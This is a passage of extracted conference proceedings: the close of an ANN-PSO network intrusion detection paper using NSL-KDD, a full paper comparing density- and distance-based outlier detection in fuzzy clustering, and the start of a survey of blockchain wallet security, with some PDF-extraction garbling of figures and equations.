A Hybrid Approach of ANN-PSO Technique … 761

Fig. 1 The ANN-PSO algorithm

criticism revolves around the non-familiarity of the traffic to real data networks,
no exact definition of attacks, and so on [13]. In these, the labelled attacks can be
classified into four subdivisions:
• denial of service attacks (DoS) take over a particular system and shuts down traffic
to and from the system, causing a large influx in the traffic, more than system
capacity, leading to the system shutting down.
• Probe attacks, also known as surveillance attacks, steal sensitive information.
• Users to Root attacks (U2R) attempt to exploit weaknesses in a system to gain
access to the network as a super-user for root access to that network.
• Remote to Local attacks (R2L) access a remote machine without access to the
local network which compromises network from a remote machine.
The labels of all the attacks mentioned in the KDD data-sets were successfully
categorised according to the four intrusion attack classes. Table 1 contains attacks
and percentages of each attack recorded.
762 S. Dahiya et al.

Table 1 Kinds of attacks and their subset category along with percentage in the datasets
Attacks Label KDDTrain+ KDDTest+
DoS Neptune, teardrop, 47420 (37.64%) 7533 (33.41%)
nmap, smurf, pod,
back, land, udpstorm,
worm, apache2,
mailbomb,
processtable
Probe Ipsweep, portsweep, 10163 (8.07%) 2348 (10.41%)
saint, satan, mscan
U2R xterm, perl, rootkit, 52 (0.04%) 67 (0.31%)
buffer_overflow,
loadmodule, sqlattack,
ps
R2L xlock, warezclient, 995 (0.79%) 2885 (12.90%)
guess_passwd,
snmpguess, ftp_write,
phf, warezmaster,
multihop, imap, spy,
sendmail, httptunnel,
named, snoop,
snmpgetattack

Table 2 The subsets in training and testing datasets


Attacks Train_ Test_ Train_ Test_ Train_ Test_ Train_ Test_ Train_ Test_
DoS DoS Probe Probe U2R U2R R2L R2L Mixed Mixed
Normal 2000 2000 2000 2000 2000 2000 2000 2000 2000 9000
DoS 100 100 0 0 0 0 0 0 100 100
Probe 0 0 100 100 0 0 0 0 100 100
U2R 0 0 0 0 50 50 0 0 50 50
R2L 0 0 0 0 0 0 50 50 50 50
2100 2100 2100 2100 2050 2050 2050 2050 9300 9300

Preprocessing of Data-Set The datasets are preprocessed using one-hot encod-


ing, to change categorical values to a binary encoded form. This increases the number
of features from the initial 42–123 features. The features undergoing one-hot encod-
ing are: Protocol Type, Service, and Flag. After encoding these features, class labels
were created and encoded. We split the datasets into 5: DoS, Probe, U2R, R2L and
Mixed as shown in Table 2.
A Hybrid Approach of ANN-PSO Technique … 763

4.2 Performance Metrics

Accuracy is used as the performance measure for our model where Accuracy is given
by the number of correct predictions by all of the predictions made.

TP +TN
Accuracy = (3)
T P + FP + FN + T N

The numerator specifies the right predictions (True positives and True Negatives),
whereas, the denominator describes all the predictions by the algorithm. To measure
the performance, the confusion matrix is used.

4.3 Analysis

The results obtained for each of these subsets are discussed below with comparison
with the various optimisation parameters, focusing on number of particles versus
accuracy and best cost, number of iterations versus accuracy and best cost, number
of hidden neurons versus accuracy and best cost.
In the graph shown in Fig. 2 the increase in particles to 500, causes the accuracy
to improve 95–98%, with similar performance towards the end of the curve. With
respect to the change in best cost with an increase in Particles in Fig. 3, the best cost
reduces as we increase the particles, and reaches a constant value.
The graph in Fig. 4 shows the accuracy of all the attack types consistently increases
from 95% and reaches its peak at to 98%, as we increase the iterations to 200. All the
subsets show similar behaviour as we increase the iterations and eventually become
constant. In Fig. 5 the best cost reduces as we increase the iterations. Exhibiting
similar behaviour, it reaches a point of constant value after certain iterations, and the
performance of the model does not change after.

Fig. 2 Graph studying the


comparison between the
particles and accuracy
764 S. Dahiya et al.

Fig. 3 Graph studying the


comparison between the
particles and best cost

Fig. 4 Graph studying the


comparison between
iterations and accuracy

Fig. 5 Graph studying the


comparison between the
particles and best cost
A Hybrid Approach of ANN-PSO Technique … 765

Fig. 6 Graph studying the


comparison between the
hidden neurons and accuracy

Fig. 7 Graph studying the


comparison between the
hidden neurons and accuracy

The graph in Fig. 6 shows that the accuracy increases until 50 hidden neurons,
and thereafter, reaches a constant value. Similarly, for the graph in Fig. 7, the cost
reduces to 50 hidden neurons and then it gets saturated.

5 Conclusion

Through this paper, we presented the supervised learning model of artificial neural
networks coupled with particle swarm optimisation, which is used for training the
algorithm, to detect unknown anomaly attacks. The algorithm was tested using the
standard public data-set NSL-KDD. The experimental results and comparison with
similar studies conducted in the field of intrusion detection with supervised learning,
our model is more reliable, as the accuracy obtained for the various subdivisions
of the data-set, namely, DoS, Probe, R2L, U2R and Mixed, show accuracy ranging
from 97–99%, with very slight diversion.
766 S. Dahiya et al.

There are optimum parameters that can be set to get best results using the ANN-
PSO algorithm, indicating that the fixed parameters used during the algorithm impacts
the performance metrics. Using 50 particles or more gives the best accuracy; and the
optimal accuracy is obtained at 75 particles. The number of hidden neurons are
typically varying across the subdivisions but using 75–150 hidden neurons shows
maximum accuracy. The marginal increase in accuracy while further changing the
parameters of the algorithm proves that the ANN-PSO model is consistent.

References

1. Shilpashree, S., et al. (2020). Evaluation of Supervised Machine Learning Algorithms for Intru-
sion Detection in Wireless Network Using KDDCUP’99 and NSLKDD Datasets. International
Journal of Advanced Science and Technology, 29(3), 15037-15052–15037-15052
2. Pu, G., Wang, L., Shen, J., & Dong, F. (2021). A hybrid unsupervised clustering-based anomaly
detection method. Tsinghua Science and Technology, 26(2), 146–153.
3. Chandre, P. R., Mahalle, P. N., & Shinde, G. R. (2018). Machine learning based novel approach
for intrusion detection and prevention system: A tool based verification. In IEEE Global Con-
ference on Wireless Computing and Networking (GCWCN) (pp. 135–140). India: Lonavala.
4. Fischer-Hübner, S. (n.d.). Intrusion Detection (IDS). Karlstad University Computer Science.
www.cs.kau.se/cs/education/courses/dvgc04/07p5/slides/Intrusion%20Detection%20(IDS).
pdf
5. Zhang, X., Niyaz, Q., Jahan, F., & Sun, W. (2020). Early detection of host-based intrusions
in linux environment. In IEEE International Conference on Electro Information Technology
(EIT) (pp. 475–479). Chicago: IL, USA.
6. Malek, Z. S., Trivedi, B., & Shah, A. (2020). User behavior pattern -signature based intrusion
detection. 2020 Fourth World Conference on Smart Trends in Systems, Security and Sustain-
ability (WorldS4) (pp. 549–552). London: United Kingdom.
7. Anand Sukumar, J. V., Pranav I., Neetish, M. & Narayanan, J. (2018). Network intrusion detec-
tion using improved genetic k-means algorithm. In: 2018 International Conference on Advances
in Computing, Communications and Informatics (ICACCI) (pp. 2441–2446). Bangalore.
8. Halimaa, A., & Sundarakantham, K. (2019). Machine learning based intrusion detection sys-
tem. In 3rd International Conference on Trends in Electronics and Informatics (ICOEI) (pp.
916–920). India: Tirunelveli.
9. Johari, R., Kalra, S., Dahiya, S., & Gupta, K. (2021). S2NOW: Secure social network ontology
using whatsApp. Security and Communication Networks, 2021, Article ID 7940103, 21 pages.
10. Dahiya, S., & Sharma, R. (2018). Comparative study of popular cryptographic techniques.
In 2018 Second World Conference on Smart Trends in Systems, Security and Sustainability
(WorldS4) (pp. 36–43). London.
11. KDD Cup 1999 Data, kdd.ics.uci.edu/databases/kddcup99/kddcup99.html
12. Kaliappan, J. (2015). Intrusion detection using artificial neural networks with best set of fea-
tures. International Arab Journal of Information Technology.
13. Tavallaee, M., Bagheri, E., Lu, W., & Ghorbani, A. A. (2009). A detailed analysis of the KDD
CUP 99 data set. IEEE Symposium on Computational Intelligence for Security and Defense
Applications (pp. 1–6). Ottawa, ON.
14. Hamid, Y., Ranganathan, B., Journaux, L., & Sugumaran, M. (2018). Benchmark datasets for
network intrusion detection: A review. International Journal of Network Security.
15. McHugh, J. (2000). Testing intrusion detection systems: a critique of the 1998 and 1999 darpa
intrusion detection system evaluations as performed by lincoln laboratory. ACM Transactions
on Information and System Security, 3(4), 262–294.
A Hybrid Approach of ANN-PSO Technique … 767

16. Taher, K. A., Jisan, B. M., & Rahman, M. M. (2019). Network intrusion detection using
supervised machine learning technique with feature selection. In 2019 International Conference
on Robotics,Electrical and Signal Processing Techniques (ICREST), pp. 643–646.
17. NSL-KDD-Datasets-Research-Canadian Institute for Cybersecurity-UNB. (n.d.). University
of New Brunswick www.unb.ca/cic/datasets/nsl.html
18. Latah, M., & Toker, L. (2018). Towards an efficient anomaly-based intrusion detection for
software-defined networks. IET Networks, 2(7), no. 6, pp. 453–59. arXiv.org.
19. Nagappan, K., Kanmani, S., & Uthariaraj, V. (2013). Improving fault prediction using ANN-
PSO in object oriented systems. International Journal of Computer Applications.
20. Khraisat, A., Gondal, I., Vamplew, P., et al. (2019). Survey of intrusion detection systems:
techniques, datasets and challenges. Cybersecur, 2, 20.
Comparison of Density-Based
and Distance-Based Outlier Identification
Methods in Fuzzy Clustering

Anjana Gosain and Sonika Dahiya

Abstract Outlier identification is a process of identification of any kind of abnor-


mality in the data regarding to context or behavior of data objects. In literature, various
outlier identification methods such as statistical methods, clustering-based methods,
and proximity-based methods have been proposed. However, in fuzzy clustering,
mainly proximity-based methods (density-based and distance-based) are used for
outlier identification. In this paper, we have compared a density-based outlier iden-
tification method and a distance-based outlier identification method in context of
fuzzy clustering. Experimental results of these outlier identification methods show
higher stability and accuracy of distance-based method over density-based method.

Keywords Outlier identification · Fuzzy clustering · FCM · DOFCM · DBKIFCM

1 Introduction

An outlier is basically any kind of abnormality in the data regarding behavior or


context of data objects that makes its study vastly important [1, 2]. Outlier iden-
tification is a major research area in data mining as it is very effective in fraud
detection, network intrusion detection, activity monitoring, surveillance, and many
such activities/applications [3, 4].
Outlier identification methods have been put in different categories based on
different paradigm as shown in Fig. 1. Statistical methods are based on some statis-
tical model, and any object that fails to follow the statistical model is identified
as outlier. This method works well for applications like intrusion detection and
fraud detection where objects follow some statistical model, but for applications like
medical images, this method does not perform well. Clustering-based methods work
on various clustering approaches and are effective for areas where grouping is to be

A. Gosain
USICT, GGSIP University, Delhi, India
S. Dahiya (B)
Delhi Technological University, Delhi, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 769
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_62
770 A. Gosain and S. Dahiya

Outlier Identification
Methods

Statistical Methods (or Clustering Proximity Based


Model Based Methods) Based Methods Methods

Parametric Non-Parametric Distance Density-Based


Methods Methods Based Methods
Methods

Fig. 1 Classification of outlier detection methods

formed. However, clustering is a very expensive mining operation. Proximity-based


methods work on proximity of the data objects to its neighbors, and these methods
are used in most of applications. In fuzzy clustering also, mainly proximity-based
methods have been used for outlier identification.
Fuzzy clustering is process of partitioning data objects in groups called clusters,
but this partition is not crisp as membership of a data object varies from zero to one
to any given cluster. Fuzzy cluster analysis has wide application in domains such
as astronomy, image segmentation, and medical imaging for various applications
like object recognition, customer segmentation, pattern recognition, etc. In literature,
many fuzzy clustering techniques have been proposed [5–9], but for outlier identifica-
tion mainly density-based methods [10] and distance-based methods [10] have been
used. Density-based method (DO) [10–12] introduced neighborhood membership
based on density of data objects in neighborhood radius and neighborhood member-
ship of an outlier is relatively much lower than that of non-outliers. However, DO has
certain drawbacks like (1) it concentrates solitary on local outliers, (2) it is susceptible
to the pick of threshold value, and (3) it does not converge well for threshold value.
DB overcomes these drawbacks of DO by using the concept of k-nearest neighbors
and considering that if the distance of kth nearest neighbor to a data object is greater
than a calculated distance (rspatium), then that data object is an outlier.
In this paper, we have compared these two outlier identification algorithms—
DO and DB on standard datasets—D12, D15, D115, Bensaid dataset. Results are
represented using figures, tables, and histograms, and it is observed that DB focuses
on global outliers whereas DO focuses on local outliers as well as DB outperforms
DO in various aspects.
Organization of the paper is as follows: brief description of density-oriented (DO)
and distance-based (DB) approach of outlier identification in Sect. 2, DO vs DB in
Sect. 3, followed by conclusion in Sect. 4.
Comparison of Density-Based and Distance-Based … 771

2 Density-Oriented (DO) and Distance-Based (DB)


Approach of Outlier Identification in Context of Fuzzy
Clustering

2.1 Density-Oriented Approach [10–12]

A density-based outlier detection method considers the density of a data object and
its neighbors. A data object is spotted as an outlier if its density is comparatively far
poorer than that of its neighbors [10].
Based on this concept of density-based outlier, a variation density-based outlier
method, DO, is proposed by P. Kaur and A. Gosain in 2010 [11, 12]. In DO, outlier
identification is done by presenting a new term, neighborhood membership, which
is defined as follows:

ηneighborhood
i
i
Mneighborhood (X ) = (1)
ηmax

where ηneighborhood
i
= sum of data objects in neighborhood of data object—‘xi ’ and
ηmax =i=1...n (ηneighborhood
max i
). Any data object, ‘x j ’, is said to be in neighborhood of
‘xi ’ only if it fulfills the following condition:

p ∈ X, i ∈ X |dist( p, i) ≤ rneighborhood (2)

where dist(p, i) is Euclidean distance between ‘i’ and ‘p’; and r neighborhood is neigh-
borhood radius. Outliers are pin pointed using the following equation after tuning a
i
threshold value ‘α’ for Mneighborhood :
 
< α, outlier
i
Mneighborhood = , ∀i. i[1, . . . , n] (3)
≥ α, non-outlier

2.2 Distance-Based Approach [10, 13]

A distance-based outlier detection method checks in the neighborhood of data object,


which is expressed using a user given radius. A data object is categorized as an outlier
if its neighborhood does not have enough other data objects. For each object, x i , count
the number of other objects in its r-neighborhood. If most of the objects in X are far
from x i , then x i is an outlier. Mathematically, an object, x i , is a distance-based outlier
if:
772 A. Gosain and S. Dahiya
 
 xi |dist xi , x j ≤ r 
=π (4)
X 

Based on this concept, a variation of distance-based outlier is proposed by Gosain


and Dahiya [13], which is based on the spread of data, and it determine the minimum
number of data objects that must be in the close proximity, say k, then determines
neighborhood radius as per Ester [14], if the distance to kth nearest neighbor of any
data object is greater than neighborhood radius then that data object is an outlier.
Mathematical formulation of outlier identification[13] is as follows:
    
x j dist xi , x j ≤ r Outlier_Spatium < knn for {∀ j ∈ [1 . . . N ], j = i} (5)
⎧     

⎪ Outlier if x j dist xi , x j ≤ r Outlier_Spatium < knn

for {∀ j ∈ [1 . . . N ],  j = i}
 
xj = (6)
⎪ Not Outlier if x j dist xi , x j ≤ r Outlier_Spatium ≥ knn


for {∀ j ∈ [1 . . . N ], j = i}

where knn is k-nearest neighbors, computed as knn = X  · f _X , ||X|| is dataset


size, and f_X is a fraction of dataset. x j and x i are jth and ith data object of the
   2
data set—‘X’ and dist xi , x j = 2 xi z − x j z is Euclidean distance between
data objects—xi and xj . rOutlier_Spatium is outlier spatium, that is computed using knn,
knn = X  · f _X , and Ester et al. [14] defined approach.

3 DO Versus DB

In this section, we have compared DO and DB. In Sect. 3.1, step-by-step working is
discussed on two standard datasets. In Sect. 3.2, performance analysis on number of
standard datasets is discussed.

3.1 Dataset Used

For this work, four standard dataset forms are used: D12, D15, D115, and Bensaid.
Brief description for each dataset is give in Table 1.

3.2 Performance Analysis of DO and DB on Various Dataset

Figures 2 and 3 show outlier identification using DO and DB algorithm on D12


dataset for various threshold values (0.05, 0.10, 0.15, 0.20, 0.25), respectively. From
Comparison of Density-Based and Distance-Based … 773

Table 1 Brief of datasets


D12 D15 D115 Bensaid
Size of 12 15 115 298
dataset
Number of 2 2 2 3
clusters
Features of Uniformly Uniformly Random shaped Highly density
dataset distributed distributed almost equal and size varying
identical clusters identical clusters density clusters cluster

15 15 15

10 10 10

5 5 5

0 0 0

-5 -5 -5

-10 -10 -10


-10 -5 0 5 10 -10 -5 0 5 10 -10 -5 0 5 10
(a) (b) (c)

15 15

10 10

5 5

0 0

-5 -5

-10 -10
-10 -5 0 5 10 -10 -5 0 5 10
(d) (e)

Fig. 2 Working of DO on D12 for various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25

Figs. 2, 3, and Table 2, it can be observed that DB is able to identify the noise and
outlier, but DO does identify only one outlier in a range of 0.0–0.35 threshold value.
Figures 4 and 5 are step wise process of DO and DB outlier identification process
for D115 dataset on various threshold values (0.05, 0.10, 0.15, 0.20, 0.25) respec-
tively. From Figs. 4, 5, and Table 2, it can be observed that DB shows high stability
in outlier identification as for the threshold value range 0.0–0.35, count of outliers is
8–10, but for the same range DO shows count of outliers from 9 to 37.
For further detailed analysis of performance of DO and DB, results are represented
using histograms in Figs. 6, 7, and 8. For all these plots, x-axis shows threshold value
and y-axis shows number of outliers, and red colored bars are for DB results and
green colored bars are for DO results. It is observed from these histograms that
DB shows higher stability and accuracy in identification of outliers, as well as not
hypersensitivity to the choice of threshold value and quick convergence on threshold
value of distance-based method over density-based method.
774 A. Gosain and S. Dahiya

15 15 15

10 10 10

5 5 5

0 0 0

-5 -5 -5

-10 -10 -10


-10 -5 0 5 10 -10 -5 0 5 10 -10 -5 0 5 10
(a) (b) (c)

15 15

10 10

5 5

0 0

-5 -5

-10 -10
-10 -5 0 5 10 -10 -5 0 5 10
(d) (e)

Fig. 3 DB on D12 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25

Table 2 Performance analysis on D12 and D115


Threshold value D12 D115
DB DO DB DO
No_of_Outliers No. Of Outliers No_of_Outliers No. Of Outliers
0.01–0.06 1 1 10 9
0.07–0.013 1 1 10 10
0.14–0.16 1 1 10 14
0.17–0.20 2 1 9 14
0.21–0.25 2 1 9 21
0.26 1 1 9 21
0.27–0.32 1 1 9 31
0.33 1 1 9 31
0.34 3 1 9 37
0.35 3 1 8 37

4 Conclusion

In this paper, we have compared a density-based outlier identification method and a


distance-based outlier identification method in context of fuzzy clustering. Experi-
ment is performed on standard datasets: D12, D15, D115, Bensaid, and experimental
results show higher stability and accuracy in identification of outliers, as well as not
Comparison of Density-Based and Distance-Based … 775

20 20

10 10

0 0

-10 -10

-20 -20

-30 -30
-40 -20 0 20 40 60 -40 -20 0 20 40 60
(a) (b)

20 20

10 10

0 0

-10 -10

-20 -20

-30 -30
-40 -20 0 20 40 60 -40 -20 0 20 40 60
(c) (d)
20 20

10 10

0 0

-10 -10

-20 -20

-30 -30
-40 -20 0 20 40 60 -40 -20 0 20 40 60
(e) (f)

Fig. 4 DO on D115 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25, f 0.30

hypersensitivity to the choice of threshold value and quick convergence on threshold


value of distance-based method over density-based method.
776 A. Gosain and S. Dahiya

20 20

0 0

-20 -20

-40 -40
-40 -20 0 20 40 60 -50 0 50 100
(a) (b)
40 40

20 20

0 0

-20 -20

-40 -40
-50 0 50 100 -50 0 50 100
(c) (d)
40 40

20
20
0
0
-20
-20
-40

-40 -60
-50 0 50 100 -50 0 50 100
(e) (f)

Fig. 5 DB on D115 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25

D15
Series1 Series2
20

15

10

0
0.00
0.05
0.10
0.15
0.20
0.25
0.30
0.35
0.40
0.45
0.50
0.55
0.60
0.65
0.70
0.75
0.80
0.85
0.90
0.95
1.00

Fig. 6 DO versus DB on D15


Comparison of Density-Based and Distance-Based … 777

D115 Series1 Series2


150
100
50
0
0
0.04
0.08
0.12
0.16
0.2
0.24
0.28
0.32
0.36
0.4
0.44
0.48
0.52
0.56
0.6
0.64
0.68
0.72
0.76
0.8
0.84
0.88
0.92
0.96
1
Fig. 7 DO versus DB on D115

Bensaid Dataset
Series1 Series2
350
300
250
200
150
100
50
0
0
0.04
0.08
0.12
0.16
0.2
0.24
0.28
0.32
0.36
0.4
0.44
0.48
0.52
0.56
0.6
0.64
0.68
0.72
0.76
0.8
0.84
0.88
0.92
0.96
1
Fig. 8 DO versus DB on Bensaid dataset

References

1. Hawkins, D. M. (1980). Identification of outliers (Vol. 11). London: Chapman and Hall.
2. Wu, X., Kumar, V., Ross Quinlan, J., Ghosh, J., Yang, Q., Motoda, H., McLachlan, G.J., et al.
(2008). Top 10 algorithms in data mining. Knowledge and Information Systems 14(1).
3. Ye, Xi., Zongxiang, Lu., Qiao, Y., Min, Y., & O’Malley, M. (2016). Identification and correction
of outliers in wind farm time series power data. IEEE Transactions on Power Systems, 31(6),
4197–4205.
4. Forero, P. A., Shafer, S., & Harguess, J. D. (2017). Sparsity-Driven Laplacian-regularized
outlier identification for dictionary learning. IEEE Transactions on Signal Processing, 65(14),
3803–3817.
5. Bezdek, J. C., Ehrlich, R., & Full, W. (1984). FCM: The fuzzy c-means clustering algorithm.
Computers & Geosciences, 10(2–3), 191–203.
6. Gosain, A., & Dahiya, S. (2016). Performance analysis of various fuzzy clustering algorithms:
A review. Procedia Computer Science, 79, 100–111.
7. Dahiya, S., Gosain, A., & Mann, S. (2020). Experimental analysis of fuzzy clustering
algorithms. InIntelligent data engineering and analytics (pp. 311–320). Singapore: Springer.
8. Dahiya, S., Gosain, A., & Gupta, S. (2020). RKT2FCM: RBF Kernel-Based Type-2 Fuzzy
Clustering. Available at SSRN 3577549.
9. Dahiya, S., Nanda, H., Artwani, J., & Varshney, J. (2020). Using clustering techniques and
classification mechanisms for fault diagnosis. International Journal, 9(2).
10. Han, J., Kamber, M., & Pei, J. (2006). Data mining, southeast asia edition: Concepts and
techniques. Morgan Kaufmann
11. Kaur, P., & Gosain, A. (2010). Density-oriented approach to identify outliers and get noiseless
clusters in Fuzzy C—Means. In 2010 IEEE International Conference on Fuzzy Systems (FUZZ)
(pp. 1–8). IEEE.
12. Kaur, P., & Gosain, A. (2011). A density oriented fuzzy C-means clustering algorithm for recog-
nising original cluster shapes from noisy data. International Journal of Innovative Computing
and Applications, 3(2), 77–87.
778 A. Gosain and S. Dahiya

13. Gosain, A., & Dahiya, S. (2020). A new robust fuzzy clustering approach: DBKIFCM. Neural
Processing Letters, 52(3), 2189–2210.
14. Ester, M., Kriegel, H.-P., Sander, J., & Xiaowei, Xu. (1996). A density-based algorithm for
discovering clusters in large spatial databases with noise. Kdd, 96(34), 226–231.
Analysis of Security Issues in Blockchain
Wallet

Taruna and Rishabh

Abstract Blockchain is a substantive technology which provide reliable and conve-


nient services by establishing trust in open environment. Blockchain basically
relies upon two critical technological areas of cryptography and decentralization to
perform transactions of confidential data. This technology is gaining traction since
its discovery in 2008 due to its ability to accomplish immutable transactions without
third party interfere. Owing to these astonishing features, it has become backbone
of all industries and business including digital financing, e-Governance, smart grid,
etc. Many banking and financial service providers have started to allot wallets to
its customer where they can use money in highly secure environment. However,
blockchain is considered the most secure technology available today, but its wallet
is still not a temper proof. This paper aims to analyse various issues pertaining to
blockchain wallet security. The existing developments in this area are studied in
detail to pave a future direction of research in this regime. Section 1 is introduction
of blockchain which includes blockchain wallets and their types, security issues in
wallets and security practices used to resolve those issues. Section 2 includes wallet
security challenges, vulnerabilities and recent review of literature on wallet security
practices. Section 3 compare the related work and discuss growth in crypto crimes
due to loss of cryptocurrency. Last section concludes the paper.

Keywords Blockchain · Blockchain wallet · Cryptocurrencies · Cryptography ·


Wallet security · Crypto loss

1 Introduction

Blockchain is getting traction every day since it was introduced by Satoshi Nakamoto
in 2008 as technology to support cryptocurrency [1]. It was initially invented for the

Taruna
DPG Degree College, Gurugram, Haryana 122001, India
Rishabh (B)
ABES Engineering College, Ghaziabad, Uttar Pradesh 201009, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 779
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_63
780 Taruna and Rishabh

Bitcoin, but in later years, it has implications and applications in the areas of finance,
governance, energy grids, Internet of Things (IoT), healthcare, businesses and indus-
tries, supply chain management, education to security and privacy, and many more [2–
5]. Although various blockchain-based cryptocurrencies such as ethereum, cardano,
nano, vertcon, etc. have been issued by digital financing companies in recent past,
Bitcoin is still having the largest market capital [6]. This immutable technology is
considered immune to third party interfere, but owing to its wide spread popularity,
it is a hot target for cyber hackers [7]. These cyber risks are considered as a prime
concern in financial transactions involving critical information. With the evolution
of internet, security becomes more solicitude. Satoshi instigate blockchain which
is considered, by far, the most secure technology for exchange of information and
funds on online platform [8].
Blockchain technology gets its popularity because of its decentralized and peer-to-
peer transaction capability [9]. Although trust is the major issue with any centralized
system, which involve any third party for communication, but blockchain has the
capability of peer-to-peer transaction, so it removes the need of presence of any
third party for transaction [10]. In other words, sender and receiver, the two peers
in any transaction, can communicate directly. Decentralization of blocks builds a
trustworthy system because everyone can use it anywhere, anytime, with an internet
connection.
Blockchain is a list of records called blocks. Number of blocks created from
multiple series of transactions, are connected to form a chain called ledger. This
ledger is distributed across all nodes in the network, and all the nodes in the
network will be given a copy of ledger to save, making it a Public Distributed
Ledger as shown in Fig. 1. Due to this decentralization, the risk of data tampering
reduces and data get more cryptographically secure than any centralized system [11].
Blockchain is of three types basically: public, private and hybrid. But [12] categorize
blockchain in a novel way as Cryptocurrency blockchain C2C, Business to Cryp-
tocurrency blockchain B2C and business to business blockchain B2B, depending on
its applications.
A blockchain structure has majorly two components: one is its header and other
component has transaction details. Block header contain all the details required to
carry out a transaction in blockchain [13]. It has a wallet which is basically address
of a node in the form of numbers and letters, which is public. In any transaction

Fig. 1 Public distributed


ledger
Analysis of Security Issues in Blockchain Wallet 781

Fig. 2 Attributes of a
blockchain block

detail, only the numbers of a wallet will be visible; no record of the person(s) can be
found. On the contrary, a private key is string of random numbers which is known
only to the person to which it belongs. When a transaction is performed by a node
in network, it will sign the transaction using its private key [14, 15] (Fig. 2).
Each block along with wallet has hash value of its own block and previous block.
The hash value of a block is a unique identifier, which is generated by using hash
function. To impart more security to block, trusted hash function can be generated
using transaction record and previous block hash value as shown in Fig. 3. Such hash
function is more secure because if someone tries to change hash of a block, it needs
to change the hash of all previous blocks which is almost impossible to achieve.
To further enhance the security, make the blocks more secure and reliable, nounce
is added after each block. Each transaction basically has the details of transaction
along with wallet address of both sender and receiver and digital signature of the
sender. These details are encrypted using different encryption methods depending
on the implementation.
A block can store multiple details of transaction but not more than a ceiling of
500 transactions per block that it can store. Once a block reaches that limit, then a
new block will be created. Satoshi proposed an upper limit of 1 Mega Byte (MB) to
the size of a block [1]. It can grow up to 8 MB and sometimes more [4]. The size of
a block limits the number of transactions verified with each block by a miner. The
bigger the block size more the transactions verified.

Fig. 3 Hash and Previous hash values in blocks of blockchain


782 Taruna and Rishabh

1.1 Blockchain Wallets

A blockchain wallet is a digital locker which is basically a program that permits the
users to manage their cryptocurrency. It holds public and private keys of a user to
encrypt transaction details. A transaction is successful only if there is a match of
public and private keys of a blockchain.
Wallets can be categorized in to multiple varieties but majorly used wallets
category include the following three types depending on where a wallet is stored
[16].
Software Wallet: As the name implies, these wallets are stored in the system either
computer device or mobile device or online using Web browser. It comes with the
advantage of easy use, but security, hacking and regular back up are some pit holes
of these wallets.
Hardware Wallet: These wallets are popular due to high security and safety
compared to software wallets. Hardware wallets can store private keys of blockchain
system for users on a hardware device called Universal Serial Bus (USB) device but
they are costly to buy and use.
Paper Wallet: These are cold storage wallets where blockchain public and private
keys are generated through an application which are then printed as Quick Response
(QR) code to process a transaction. They are the safest as the beholder has to be
concerned for keeping the paper safe. But the time taken by such wallets is high
because QR code scanning is involved in every transaction.

1.2 Security Issues in Blockchain Wallets

All the cryptocurrencies used so far are based on cryptographic public–private key
system. Public keys are known to everyone and are included in every transaction detail
to show the target of funds transferred. On the other hand, private key is used for
authentication and signing a transaction, and it is known only to a person it belongs
to. Any transaction associated with an address and the generation of this address
needs private key of the sender. The blockchain wallet emerges in such scenario,
which automatically generates and stores private key for each transaction without
disclosing it to anyone [17].
The main issue with blockchain private keys is that it is a random alphanumeric
which is very hard to remembered by human being. Traditionally, the storage mech-
anism for private keys is memorization of key, cold wallets, keeping key structure
simple which can be memorized, use of wallet provider for keeping key and storing
keys in encrypted wallets [18]. All these methods have one or more problems like
complexity of private key, cold wallets insecurity, inefficiency of encrypted digital
keys, etc.
Analysis of Security Issues in Blockchain Wallet 783

1.3 Wallet Security Practices

The threat to cryptocurrency mainly surfaces when it is kept in digital wallet. As


we know, a blockchain wallet does not store cryptocoins, rather it holds a private
key and public key which permits user to make crypto transactions. A private key is
an identity of user in cryptomarket and theft can use it purposefully to make fraud
transactions to steal your assets. Following are some traditional methods used to
secure cryptocurrencies:
Cold Wallet: A hot wallet is an online wallet which stores currency online. But
unlike hot wallets, cold wallets need no internet connection. It reduces the probability
of cyber-attacks. Cold wallet can also be named as hardware wallet and is the most
practical option to keep crypto keys.
Multiple Wallets: A user can maintain any number of wallets for crypto exchange
like one for daily exchange having less assets and have other wallets to keep large
assets. This will mitigate stealing of cryptocurrencies.
Secure Device and Internet: A secure internet and secure device play a key role
in the security of digital wallet. If these are not secure, then using any other security
algorithm for private key is of no use. Using a Virtual Private Network (VPN) to
change Internet Protocol (IP) address and location makes browser safe. Antivirus
protection, VPN security and use of firewalls are some of the preventive measures
adopted to secure the wallets. Another popular method for internet security is to
change the passwords regularly.
Back-up of Wallet: It is safe to always keep a backup of digital wallet so that if
user lose device or it is being stolen, it can still have access to wallet. This will not
provide any security but keeping backup can restore access to wallet.
Two-factor Authentication: Digital wallet is usually protected by password to
secure it. But to enhance security, one can have two-layer authentication viz. first is
password and second is sending of code to user’s registered phone or email id. It will
bolster wallet security by keeping way from unauthorized attackers.

2 Literature Review

As an emerging technology, blockchain faces many problems and challenges. To


have a clear picture of state of security of blockchain wallets, we have performed
an in-depth survey of the existing issues in the area under study. Initially, not much
work was done for securing private key as the crypto crimes were not that high, but
with the increase in number of wallets, users from less than 10 million in 2016 to
around 55 million in second quarter of 2020, the researches in this area also hyped.
About 50% of the researches on wallet security are noticed to be happened during last
two years. Since crypto crimes are doubling each year since 2017, the security issue
of blockchain wallet deserves imperative studies. A classified study of blockchain
wallet security is enunciated in subsequent sub-sections.
784 Taruna and Rishabh

2.1 Security Challenges

The blockchain technology possesses astonishing features like anonymity, confiden-


tiality and security [5]. The information of each transaction in a block is encrypted
by complex algorithms for enhancing security. Each transaction is also validated by
nodes using consensus protocol and transactions are secured by cryptography [4].
Use of cryptography i.e. public key–private key algorithms, do not make it a substi-
tute of Public Key Infrastructure (PKI). Actually, blockchain technology makes use
of PKI to pick out and authenticate members which can take part in blockchain
network.
Each transaction in blockchain is associated with a pair of keys. However,
blockchain preserves anonymity and confidentiality of each transaction, but with the
poor management of private keys, cryptocurrencies might be stolen or lost forever
[19]. This is supported by an article in Cipher Trace, which states that cryptocurrency
